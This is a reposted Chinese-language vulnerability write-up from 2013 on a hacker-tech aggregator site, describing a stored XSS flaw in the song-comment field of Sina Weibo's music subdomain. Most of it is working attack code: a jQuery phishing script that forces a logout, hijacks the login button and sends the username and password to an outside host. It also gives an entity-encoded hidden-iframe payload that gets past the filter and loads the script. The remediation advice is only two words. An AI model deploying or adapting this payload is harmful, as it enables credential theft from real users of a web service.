记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Sina weibo 子域存储型xss

2013-08-23 14:35
http://music.weibo.com
 
歌曲的歌评处过滤不严,只对script 标签,http 进行了过滤,可通过标签的事件属性进行绕过。
 
为演示xss 的危害,写了个js 脚本进行div 层钓鱼。
 
基本流程是:
 
 
 
Js 代码:
 
 

unction fish () {
if ($("a")[20].innerHTML=="\u9000\u51fa") { //判断是否登陆,若登陆则退出
$.getScript("http://weibo.com/logout.php", function (data) {
location.reload();
});
} else {
$("a")[7].click(); //触发登陆框
setTimeout("getpass()", 500); //劫持登陆按钮
};
};

function getpass () { //劫持登陆按钮
$(".W_btn_g").on("click", function () {
var username = $(".W_input")[0].value; //用户名
var passwd = $(".W_input")[1].value; //密码
$.getScript("http://xxoo.com/weibo_fish.php?username="+username+"&password="+passwd);
window.name = "ok"; //标记window.name ,防止重复
});
};

if (window.name!="ok") {
fish();
};

 

通过

<iframe style=”display:none” onload=”$.getScript(‘&#104;ttp://xxoo.com/weibo_fish.js’)”></iframe>
引入js。 
 

 
修复方案:

过滤下~ 
 
知识来源: www.2cto.com/Article/201308/238450.html

阅读:67524 | 评论:0 | 标签:xss

想收藏或者和大家分享这篇好文章→复制链接地址

“Sina weibo 子域存储型xss”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云